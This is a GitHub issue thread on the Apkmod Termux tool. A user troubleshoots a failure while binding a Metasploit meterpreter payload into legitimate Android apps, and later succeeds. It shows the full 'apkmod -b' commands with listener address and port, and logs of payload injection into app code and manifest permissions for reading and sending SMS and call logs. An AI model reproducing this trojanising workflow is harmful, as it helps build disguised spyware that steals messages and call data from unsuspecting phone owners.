### ISSUE TITLE
Apkmod proulbm to save apk

### ISSUE THREAD

**Issue by rekcah-pavi** [Hax4us/Apkmod#2]
![Screenshot_20190908-163349](https://user-images.githubusercontent.com/55050467/64487418-10a95a80-d258-11e9-9fac-ccc2c84971aa.png)
Android version - 9

**Comment by Hax4us** [comment]
Attach following things : 
1. output of `termux-info` command
2. Original Application

**Comment by rekcah-pavi** [comment]
1.
termux-info                                                     Updatable packages:
libffi/stable 3.2.1-4 aarch64 [upgradable from: 3.2.1-3]          libgmp/stable 6.1.2-4 aarch64 [upgradable from: 6.1.2-2]
libgrpc/stable 1.22.0-1 aarch64 [upgradable from: 1.20.1-2]       libiconv/stable 1.16-3 aarch64 [upgradable from: 1.16-1]
libpcap/stable 1.9.0-1 aarch64 [upgradable from: 1.9.0]           libsqlite/stable 3.29.0-1 aarch64 [upgradable from: 3.29.0]
libxml2/stable 2.9.9-6 aarch64 [upgradable from: 2.9.9-5]         libxslt/stable 1.1.33-3 aarch64 [upgradable from: 1.1.33-2]
openssl/stable 1.1.1c-2 aarch64 [upgradable from: 1.1.1c-1]       postgresql/stable 11.5 aarch64 [upgradable from: 11.4]
readline/stable 8.0.1 aarch64 [upgradable from: 8.0-2]            ruby/stable 2.6.4 aarch64 [upgradable from: 2.6.3-4]
zlib/stable 1.2.11-4 aarch64 [upgradable from: 1.2.11-3]
Subscribed repositories:
https://dl.bintray.com/grimler/science-packages-24 science/stable
https://dl.bintray.com/grimler/game-packages-24 games/stable      https://dl.bintray.com/termux/termux-packages-24 stable/main
System information:
Linux localhost 3.18.120-perf #1 SMP PREEMPT Mon May 27 19:45:55 CST 2019 aarch64 Android
Termux-packages arch:
aarch64
Android version:
9
Device manufacturer:
HMD Global
Device model:
TA-1021

2.
i can't understand what do you mean by '"original Application"'

##
This following error that I got
TA-1021
$ apkmod -b 127.0.0.1 4444 /storage/emulated/0/Download3/vv.apk /sdcard/testtttt.apk
(standard_in) 1: syntax error
/data/data/com.termux/files/usr/bin/apkmod: line 118: [: 1: unary operator expected
[*] Binding /storage/emulated/0/Download3/vv.apk
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Using APK template: /storage/emulated/0/Download3/vv.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package io.va.exposed.hzmcx
[*] Loading /data/data/com.termux/files/usr/share/TermuxAlpine/root/.bind/original/smali/io/virtualapp/XApp.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Rebuilding /storage/emulated/0/Download3/vv.apk with meterpreter injection as /data/data/com.termux/files/usr/share/TermuxAlpine/root/.bind/output.apk
[-] I: Using Apktool 2.4.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable
W: res/drawable/$avd_hide_password__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_hide_password__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_hide_password__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_show_password__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_show_password__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable/$avd_show_password__2.xml: Invalid file name: must contain only [a-z0-9_.]
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/usr/bin/aapt, p, --min-sdk-version, 21, --target-sdk-version, 22, --version-code, 91, --version-name, 0.9.1, --no-version-vectors, -F, /tmp/APKTOOL8051769954994819149.tmp, -0, arsc, -0, res/drawable-hdpi-v4/abc_ab_share_pack_mtrl_alpha.9.png, -0, png, -0, res/drawable-hdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png, -0, res/drawable-hdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png, -0, res/drawable-hdpi-v4/abc_cab_background_top_mtrl_alpha.9.png, -0, res/drawable-hdpi-v4/abc_list_divide

#canot copy full...

**Comment by Hax4us** [comment]
> i can't understand what do you mean by '"original Application"'
I want your vv.apk

**Comment by rekcah-pavi** [comment]
I tested more than 5 apps , it's original virtual xposed.apk  , I rename it vv.apk (I thought that app named like syombles make error)
#and before I successfully binded this apk with termux-bunch

#i can able to decompile this apk with apkmode (I didn't try recompile)
 Only Binding giving this unknown error 

If you wish I can try any apps that you ask

**Comment by rekcah-pavi** [comment]
I reinstalled metasploit-framework,apkmod 
And now no errors 
Thankyou


apkmod -b 121.0.0.1 4566 /storage/emulated/0/backups/apps/lite.apk /storage/emulated/0/doneeetest.apk
(standard_in) 1: syntax error
/data/data/com.termux/files/usr/bin/apkmod: line 118: [: 1: unary operator expected
[*] Binding /storage/emulated/0/backups/apps/lite.apk
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Using APK template: /storage/emulated/0/backups/apps/lite.apk
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.parallel.space.lite.arm64.lhccc
[*] Loading /data/data/com.termux/files/usr/share/TermuxAlpine/root/.bind/original/smali/com/lbe/doubleagent/DAApplication64.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Rebuilding /storage/emulated/0/backups/apps/lite.apk with meterpreter injection as /data/data/com.termux/files/usr/share/TermuxAlpine/root/.bind/output.apk
[*] Signing /data/data/com.termux/files/usr/share/TermuxAlpine/root/.bind/output.apk
Payload size: 39690 bytes
Saved as: /storage/emulated/0/doneeetest.apk
[*] Binded to /storage/emulated/0/doneeetest.apk
